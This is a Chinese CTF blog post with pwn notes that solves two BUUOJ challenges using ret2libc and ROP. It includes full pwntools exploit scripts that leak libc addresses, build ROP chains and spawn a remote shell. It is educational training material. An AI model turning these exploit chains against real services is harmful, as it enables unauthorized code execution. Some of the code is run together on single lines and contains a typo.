首页 > 其他分享 >pwn刷题笔记(ret2libc、ROP)

pwn刷题笔记(ret2libc、ROP)

时间:2023-04-27 22:58:39浏览次数:44  
标签:addr plt 函数 puts system ROP pwn ret2libc p64

ciscn_2019_c_1  (ret2libc + rop)

checksec查看保护机制,开启了NX,不能往栈里写入shellcode。

encrypt函数反汇编

encrypt(){
    char s[50];
    puts(Input your Plaintext to be encrypted)
    gets(s);
    if strlen(strlen(s) < x )
    {
        puts("ciphertext")
        puts(s)
        return 0;
    }
    else 做加密
}

encrypt函数,如果输入的字符串大小小于x(x是运行过程中才赋值的),那么就退出。否则encrypt就会做一系列的加密操作,更改输入的字符。绕过加密,只需输入的第一个字符为'\0'即可。

可以发现在encrypt函数存在缓冲区溢出漏洞,但是开启了NX,考虑ROP。

 

ida查看字串,没有"system"和'/bin/sh',说明程序没有调用system函数。

再看.plt段,也没有system,但存在puts函数的.plt项。

没有libc文件,需要获取libc版本

利用思路如下:函数执行过程中获取到puts函数真实地址后,根据puts函数真实地址相对于在libc的偏移,计算出system函数和‘/bin/sh’字符串的真实地址,用到如下知识点:

libc.so 动态链接库中的函数之间相对偏移是固定的。
每个函数从libc映射到真实地址的偏移都是相等的。

先回顾下plt和got的知识

  延迟绑定机制:函数在第一次执行时才去寻找真实地址

  got表保存程序运行时的真实地址,plt实现延迟绑定。

  程序调用函数时,plt表先去找got表,看got表用没有记录函数真实地址。如果没有,plt去公共plt调用_dl_runtime_resolve 函数获取函数地址,并保存在got表中。

  plt表对应的是一系列指令;初始时,got表中存放的是plt下一条指令的地址

 

整理漏洞利用所需条件:

  输入第一个字符为'\0'

  puts函数在程序执行过程中的真实地址  

  puts函数真实地址相对于在libc.so的偏移

第一次栈溢出获取puts的真实地址,并计算出system和‘/bin/sh’的真实地址

第二次栈溢出执行system('/bin/sh')

 

第一次栈溢出:控制程序执行如下操作

  通过puts@plt表查找puts函数真实地址,并存放在got表中:puts_plt(puts_got);

  回到main函数,为第二次溢出做准备。

因此payload需要控制栈结构如下:

  

使用ROPgadget命令获取pop edi;ret的gadget,地址为:0x0000000000400c83

main函数地址为0x0000000000400B28

为什么pop edi

不同于ELF x86使用栈传递参数的方式,ELF x64参数使用寄存器传递,多余的参数才使用栈传递。
前六个整数类型参数分别存放在:rdi, rsi, rdx, rcx, r8, r9
前八个浮点数类型参数分别存放在:xxm0 - xxm7

  

第二次栈溢出控制程序执行system('/bin/sh')

payload需要控制栈结构如下:

  

添加ret指令是为了使栈平衡(16字节对齐):https://blog.csdn.net/qq_41560595/article/details/112161243

#!/usr/bin/env python3

from LibcSearcher import * from pwn import *
elf = ELF("./ciscn_2019_c_1") rdi_gadget = 0x400c83 puts_plt = elf.plt["puts"] puts_got = elf.got["puts"] main_ad = 0x400B28 #io = process("./ciscn_2019_c_1")    #本地打 io = remote("node4.buuoj.cn", 26297)  #远程打
#第一次溢出 io.sendlineafter("choice!\n", b"1")   #选择第一个选项 payload = b'\0' + b'a' * 0x4F + p64(0x1234) + p64(rdi_gadget) +p64(puts_got) + p64(puts_plt) + p64(main_ad) io.sendlineafter("Input your Plaintext to be encrypted\n", payload) print(io.recvline())   #接收encrypt函数第一个puts print(io.recvline())   #接收encrypt函数第二个puts rec = io.recvuntil('\n')    #接收plt表执行结果 puts_addr = hex(u64(rec[:-1].decode("latin-1").encode().ljust(8,b'\x00'))) #recv接收到的是字节对象,python3中,在使用u64之前,先将字节对象解码为unicode字符串,再编码为字节序列 print(puts_addr)

 libc = LibcSearcher("puts", puts_addr)      #获取libc版本
 offset = puts_addr - libc.dump('puts')      #计算puts函数从libc.so映射到真实地址的偏移
 system_addr = offset + libc.dump('system')    #根据偏移计算处system函数真实地址
 binsh_addr = offset + libc.dump('str_bin_sh')
 print(f'offset:{offset} system_address:{system_addr} binsh_address:{binsh_addr}')

 

 #第二次溢出

 ret_gadget = 0x4006b9

 io.senlineafter("choice!\n", b'1')
 payload = b'\0' + b'a' * 0x4F + p64(0x1234) + p64(ret_gadget) + p64(rdi_gadget) + p64(binsh_addr) + p64(system_addr)
 io.sendlineafter("be encrypted\n", payload)

 io.interactive()

 

[HarekazeCTF2019]baby_rop

 checksec查看保护机制,开启了NX。

 ida查看汇编代码

  

 写出对应反汇编代码

char input[0x10];
system("echo -n \"What's your name? \"");
scanf("%s", &input);
printf(""Welcome to the Pwn World, %s!\n"", input)

 存在缓冲区溢出,且开启了NX,使用ROP。

 由ida可知,“/bin/sh”地址:0x601048; system plt地址:0x400490

 ROPgadget得到pop rdi指令地址:0x400683

 构造栈如下:

  

写出利用代码

#!/usr/bin/env python3

from pwn import *

system_addr = 0x400490
binsh_addr = 0x601048
rdi_gadget = 0x400683

io = remote("node4.buuoj.cn", 29985)

payload = b'a' * 16 + p64(0x1234) + p64(rdi_gadget) + p64(binsh_addr) + p64(system_addr)
io.sendlineafter("What's your name? ", payload)
io.interactive()

 

标签:addr,plt,函数,puts,system,ROP,pwn,ret2libc,p64
From: https://www.cnblogs.com/jimmy-hwang/p/17358186.html

相关文章

  • TypeError: Cannot read properties of undefined (reading 'filter')
    TypeError:Cannotreadpropertiesofundefined(reading'filter')constfilterTableData=computed(()=>store.data.users!.filter((data)=>!search.value||data.nick.toLowerCase().includes(search.value......
  • asp.net 绑定数组数据到下拉列表,绑定数组到DropDownList,数据绑定
    前台代码:<asp:DropDownListID="ddlHPZL"runat="server"Width="130px"></asp:DropDownList>后台代码:#region绑定号牌号码string[]iniHPHM=newstring[];iniHPHM=["辽P,京A,京B,吉C,黑D,云E,蒙F,"]......
  • map注入 ,使用 @ConfigurationProperties , 修改apollo配置后不会动态修改的问题
    问题:apollo动态刷新,应用在@value这种注入方式的属性没有问题,但是如果使用@ConfigurationProperties注解的bean,动态刷新就不好使了,会注入不到的。Apollo动态刷新官网介绍需要注意的是,@ConfigurationProperties如果需要在Apollo配置变化时自动更新注入的值,需要配合使用Environm......
  • fasttrack的SQLPwnage(失败)
    这次也是失败的,操作如下:root@bt:/pentest/exploits/fasttrack#./fast-track.py-iFast-TrackMainMenu:1.Fast-TrackUpdates2.AutopwnAutomation3.NmapScriptingEngine4.MicrosoftSQLTools5.MassClient-SideAttack6.Exploit......
  • 遇到 element-ui 框架的警告 `[Element Warn]please pass correct props!`
     第二行发现是校验表单项报错,到代码中查看原来是没有给 el-form 表单中的 el-form-item 传prop参数,这个prop参数是表单域 model字段,在使用 validate、validateField、resetFields 等方法的情况下,该属性是必填的......
  • vue3 uniapp Uncaught (in promise) TypeError: Cannot read properties of null (rea
    引发这个问题是在三级页面中使用uni.navigateBack({delta:2})返回到一级页面再重一级页面进入二级页面二级页面中引用的组件引发的emitsOptions报错//原因:我在二级页面中的组件使用ts的emit写法引发的报错constemit=defineEmits<{(e:'confirm',contents:string):......
  • Properties类
    继承关系Properies运用原理图我们的java程序操作数据库时,需要提供用户名和密码。我们如果直接在程序中存储用户名和密码是及其不方便的。如果我们以后要修改用户和密码的时候,需要重新修改密码。而我们的Properies类的对象(可以直接直接创建一个Property文件作为Property对象),......
  • Exercises 1 in Statistical mechanics: entropy, order parameters, and complexity
    这里记录一下一些在《Statisticalmechanics:entropy,orderparameters,andcomplexity》这本书的第一章中的一些比较有趣的题目。Q1ThereareMdiceeachwithNsides(labeledbyintegers)andateachturneverydiceisthrownindependentlyoneafteranother,and......
  • defineProperty
    传说大名鼎鼎的vue.js是通过它实现双向绑定的。俗称属性拦截器。而且专门用来监控对象属性变化的Object.observe方法也被草案发起人撤回了(此方法在node环境中仍能使用)。可见defineProperty的威力之大了。作用在创建普通属性时属性描述符会使用默认值,我们也可以使用Object.defin......
  • pwn | jarvisoj_level3_x64
    pwn|jarvisoj_level3_x64x64ret2libcexp:frompwnimport*fromLibcSearcherimport*context.log_level='debug'p_vuln=0x00000000004005E6p_main=0x000000000040061Ap_str=0x00000000004006DC#p=process('./level3_x64')p=......